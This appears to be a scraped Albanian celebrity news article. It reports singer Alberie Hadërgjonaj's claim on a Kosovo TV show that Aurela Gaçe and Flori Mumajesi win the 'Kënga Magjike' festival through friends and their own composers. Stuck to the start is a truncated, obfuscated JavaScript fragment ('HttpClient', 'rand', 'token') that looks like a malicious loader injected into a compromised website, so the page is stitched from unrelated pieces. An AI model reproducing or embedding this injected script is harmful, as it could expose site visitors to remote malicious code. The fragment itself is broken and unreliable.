;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

A e dëgjuat komentin që dha Albërie Hadërgjonaj për Aurela Gaçen rreth “Këngës Magjike”?

By

Këngëtarja me prejardhje nga Deçani i Kosovës, Alberie Hadërgjonaj, ka qenë mbrëmë e ftuara e nikoqirit të emisionit Oxygen – Besim Dinës – në Klan Kosova.

Ajo ka rrëfyer se pse në gjithë këto vjet, nuk ka denjuar të marrë pjesë në festivalin prestigjioz shqiptar “Kënga Magjike”.

“Unë nuk kam shkuar më në Kënga Magjike sepse pa fyer asnjë këngëtar, Aurela Gaçe shkon dhe i merr 5 këngëtarë me vete që këndojnë tek lokali i saj, 4-5 shokë, edhe pak respekti dhe fiton. Flori Mumajesi ka konkurrentë 5-6 këngëtarë që i kompozon këngët dhe fiton, normal si do fitoj unë? Është mes miqsh. Nuk ka asgjë të keqe se unë ata i kam miq dhe i dua shumë, por dua të them që nëse Aurela Gaçe është në Këngën Magjike, s’kam ça kërkoj unë. Jo se ajo ka këngën më të mirë, por i ka 5 këngëtarë të vetët. Normal që është artiste e jashtëzakonshme. Edhe Flori sivjet kishte 5-6 kompozime të vetat dhe të gjithë ata i japin pikët maksimale. Unë si artiste, s’mund t’i them dikujt: A do më votosh ti? Është skandal. Unë s’kam frikë askënd. Kush këngëtarë do të vijë, të përballet, me zë, me këngë, me të folur, me të veshur, me shkrim, me lexim, me ça të duan, nuk frikësohem”, ka thënë Hadërgjonaj. /Prive.al

Artikuj të ngjashëm